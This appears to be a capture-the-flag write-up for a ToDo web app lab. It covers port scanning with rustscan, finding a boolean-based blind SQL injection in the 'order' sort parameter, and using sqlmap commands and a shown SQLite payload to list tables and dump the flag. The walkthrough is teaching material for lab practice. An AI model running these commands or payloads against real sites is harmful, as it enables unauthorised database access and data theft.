Initial Recon
We will use rustscan for port discovery
Copy rustscan -a TARGET_IP -- -A -sC The following should be the expected output
Copy PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 bc7ecc46211d6323652a21383e418c70 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDBpuQwTu6CWYZ0CLlQZOeiBk/OXIQa3YrSDsozH9fx64LoNab7VKpvL2sMkC6Hiya5xZlXKOOIb0gGRXbCNPAXYO2v1grjUq8D3xzrOkEwIyoaltEAu2X2z+OEz5LmLS9bRCTqSJuhGF5ciXsuMUs3p9DqDPqRJlePMDm+knO1dI7+mUB8iGkDEirN9iqP/VAfz44awpZG9ZKz1eLV96gaZQqDrGhl7ot7bkLroKfdUMQzOOYy91Ax/RR1Yr3YYCy43X1CiR9lJ/kZnG5bgXwmupCuW0PWBJ4bGkA/JqsxD75z3DCl8aiK0SAUoiUhsUDgTP5pM8Wyt7ANtLV8mPqU32KO//YO/mxjrJoT0erfAxGe1pw0Ry86mMTH+fqen4SjZUenydDgYYadVZvus4TdF90VmnETQ5ubGx0Lvry2PmL2LsgEZYVdYk3bTFNYs9JZMgHnpE1ejx0toupdL0e1P2Xa/Zlqjl3scOQ49F8wziyiqSPkX0nSFV2Cb0t0ud0=
| 256 ea203ed1c491e879ef2d339bf11caf10 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHGWPtvoLcSuiPd+wNAPJ0qq3EEUNg8064D1mn6y6gEShvcHKz+xLg6p3ZgfDZvtYOwtbZ5sn7StlwpFExuJiCE=
| 256 c998ec9871424589e1222a32c4d2c01d (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHXA8smlcww1+5QTpnojr12eGZDWr//L/ghypXrbf17Z
80/tcp open rtsp syn-ack
| http-methods:
|_ Supported Methods: OPTIONS HEAD GET
|_http-title: Prioritise
|_rtsp-methods: ERROR: Script execution failed (use -d to debug)
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 404 NOT FOUND
| Content-Type: text/html; charset=utf-8
| Content-Length: 232
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
| <title>404 Not Found</title>
| <h1>Not Found</h1>
| <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
| GetRequest:
| HTTP/1.0 200 OK
| Content-Type: text/html; charset=utf-8
| Content-Length: 2756
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="utf-8" />
| <meta
| name="viewport"
| content="width=device-width, initial-scale=1, shrink-to-fit=no"
| <link
| rel="stylesheet"
| href="../static/css/bootstrap.min.css"
| crossorigin="anonymous"
| <link
| rel="stylesheet"
| href="../static/css/font-awesome.min.css"
| crossorigin="anonymous"
| <link
| rel="stylesheet"
| href="../static/css/bootstrap-datepicker.min.css"
| crossorigin="anonymous"
| <title>Prioritise</title>
| </head>
| <body>
| <!-- Navigation -->
| <nav class="navbar navbar-expand-md navbar-dark bg-dark">
| <div class="container">
| class="navbar-brand" href="/"><span class="">Prioritise</span></a>
| <button
| class="na
| HTTPOptions:
| HTTP/1.0 200 OK
| Content-Type: text/html; charset=utf-8
| Allow: OPTIONS, HEAD, GET
| Content-Length: 0
| RTSPRequest:
| RTSP/1.0 200 OK
| Content-Type: text/html; charset=utf-8
| Allow: OPTIONS, HEAD, GET
|_ Content-Length: 0
It looks like there is only a single http server runnning a ToDo application, nothing interesting for us.
Let's head over to the ToDo app!
Let's add few items to the list
As you can see, I tried XSS payload and sql injection payload, but there is no success.
Let's use the Sort Option in the application
This could be our valid exploitation point, a perfect GET request.
We can now use SQLMap to do the job.
Attack Phase
FIring up SQLMap
Copy sqlmap -u http://TARGGET_IP/\?order\=date --risk 3 --level 3 We are using SQLMap because we want an automated solution to a Blind SQL Injection, which if you do it manually will take a lot of time
After sometime, running the sqlmap we find a valid payload
Copy [22:19:06] [INFO] checking if the injection point on GET parameter 'order' is a false positive
GET parameter 'order' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 807 HTTP(s) requests:
---
Parameter: order (GET)
Type: boolean-based blind
Title: SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)
Payload: order=date AND CASE WHEN 3835=3835 THEN 3835 ELSE JSON(CHAR(88,99,121,110)) END
---
[22:19:14] [INFO] the back-end DBMS is SQLite Let's check for tables now, since we are using a blind sql injection, we can use threads to make the process faster
Copy sqlmap -u http://TARGET_IP/\?order\=date --risk 3 --level 3 --tables --threads 10
Copy [2 tables]
+-------+
| flag |
| todos |
+-------+ Well now we can check for the flag using the following command
Copy sqlmap -u http://TARGET/\?order\=date --risk 3 --level 3 -T flag --threads 10 --dump We now have the flag!
Copy [22:22:51] [INFO] retrieved: 38
[22:23:04] [INFO] retrieved: flag{65f2f8cfd53d59422f3_REDACTED}
Database: <current>
Table: flag
[1 entry]
+----------------------------------------+
| flag |
+----------------------------------------+
| flag{65f2f8cfd53d59422f3_REDACTED} |
+----------------------------------------+
